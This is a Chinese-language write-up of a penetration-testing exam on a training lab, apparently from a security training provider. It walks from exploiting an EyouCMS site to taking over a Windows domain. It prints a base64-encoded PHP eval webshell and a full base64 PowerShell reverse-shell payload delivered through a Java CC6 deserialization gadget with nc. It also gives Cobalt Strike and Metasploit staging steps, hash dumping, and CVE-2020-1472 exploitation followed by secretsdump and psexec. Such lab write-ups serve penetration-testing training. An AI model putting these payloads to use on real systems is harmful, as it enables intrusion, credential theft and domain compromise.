0考核介绍
本次考核最终通过人数七人 达到预期目标
考核内容
本次考核使用在线靶靶场,主要考核从外网打点到内网域渗透的能力。
web:php代码审计 、java反序列化漏洞利用等。
内网:隧道应用、横向渗透、域渗透等 。
难度 中
拓扑图:
1WEB
指纹识别
得知目标为 易优CMS
寻找后台
dirsearch扫描发现后台地址
后台登录绕过
参考链接:https://www.cnblogs.com/Pan3a/p/14880225.html
利用脚本跑出来
替换PHPSESSID进入后台
getshell
后台代码执行漏洞
进入模板管理
进入 pc 文件夹
进入index.htm
执行恶意代码
<?=exec('whoami');进入首页,右键检查源码
恶意代码执行成功
写入webshell
直接替换即可
<?phpfile_put_contents("./uploads/allimg/moonsec.php",base64_decode("PD9waHAgcGhwaW5mbygpO0BldmFsKCRfUkVRVUVTVFsidnZ2Il0pOz8+"));?>
连接成功
换到线上同理
2内网
cobalt strike powershell上线
web钓鱼—>web投递—>运行
复制粘贴到哥斯拉
成功上线
抓取Hash
hashdump
用somd5 MD5解密,得到密码
metasploit exe上线
metasploit生成exe后门程序
上传 shell.exe 到 C:\Windows\Temp\
cd C:\Windows\Temp\
shell shell.exe 运行
metasploit成功上线
cobalt strike开启socket代理
nmap扫描
kali配置 /etc/proxychains.conf
使用nmap进行端口扫描
扫描结果
Host is up (0.35s latency).Not shown: 991 closed portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds9999/tcp open abyss?49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49155/tcp open msrpc Microsoft Windows RPC49156/tcp open msrpc Microsoft Windows RPCMAC Address: 00:0C:29:CA:1F:4B (VMware)Device type: general purposeRunning: Microsoft Windows 7|2012|8.1OS CPE: cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_2012 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1Uptime guess: 0.073 days (since Tue Oct 4 00:47:51 2022)Network Distance: 1 hopTCP Sequence Prediction: Difficulty=263 (Good luck!)IP ID Sequence Generation: IncrementalService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:| nbstat: NetBIOS name: DATA, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ca:1f:4b (VMware)| Names:| DATA<00> Flags: <unique><active>| VSMOON<00> Flags: <group><active>|_ DATA<20> Flags: <unique><active>| smb-security-mode:| account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode:| 2.02:|_ Message signing enabled but not required| smb2-time:| date: 2022-10-04 02:33:30|_ start_date: 2022-10-04 00:48:29TRACEROUTEHOP RTT ADDRESS1 351.31 ms 192.168.22.146NSE: Script Post-scanning.Initiating NSE at 02:33Completed NSE at 02:33, 0.00s elapsedInitiating NSE at 02:33Completed NSE at 02:33, 0.00s elapsedRead data files from: /usr/bin/../share/nmapOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 244.88 secondsRaw packets sent: 2026 (89.838KB) | Rcvd: 1167 (47.418KB)
发现存在 域 和9999端口
发现web机器桌面存在
QQclient.jar 和 账号.txt
账号内容为:
moonsec 123456
100 123456
使用之前的socket代理
输入账号密码成功登录
猜测应该是个通讯类程序
使用 JD-GUI 反编译 QQclient.jar,发现IP:192.168.22.146,Port:9999
Java反序列化
在Github发现源代码
于是就下载研究了一下
URLDNS
使用URLDNS链测试
dnslog成功回显,此源码存在java反序列化漏洞
cc6
把calc.exe改成powershell反弹shell,powershell需要base64编码
网站:https://shell.nctry.com/
编码后替换calc.exe
编码后内容:
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAuADEANQAyACIALAAxADEAMgA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==socket 9999 反序列化漏洞
在 某位大帅比师傅 的提点下 使用nc发送cc6.bin(记得自己下一个nc)
type cc6.bin | nc -v 192.168.22.146 9999
nc -lvnp
成功接收 反弹shell
端口转发(事前准备1)
由于Data不出网,可是需要下载工具,所以进行端口转发
192.168.22.152 1441 端口转发到 vps 的 7007 端口
vps上用python3开启http服务
cobalt strike 转发上线(事前准备2)
下载后门
下载完成后执行 beacon.exe
成功转发上线
metasploit上线
metasploit 生成 直连exe
metasploit 设置直连
对 Data 信息收集 发现了 第二张 网卡
域内信息收集
cobalt strike 插件
metasploit meterpreter
CVE-2020-1472
cobalt strike 插件 进行漏洞攻击
CVE-2020-1472 攻击成功
这里有两种方法:
(1)在windows上使用impacket-examples-windows工具包
(2)linux在代理下使用impacket工具包
这里我用了第一种
通过 secretsdump.exe 成功 dump 域管 hash
psexec.exe 横向到域管(也可以在代理下使用 psexec.py )
可以先建立 ipc 连接,然后copy后门到目标机器
metasploit 直连上线 最后一台
4考核结果
5关注公众号
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏
6关于培训
需要渗透测试培训
扫一扫添加微信咨询
课程内容点击了解
如有侵权请联系:admin#unsafe.sh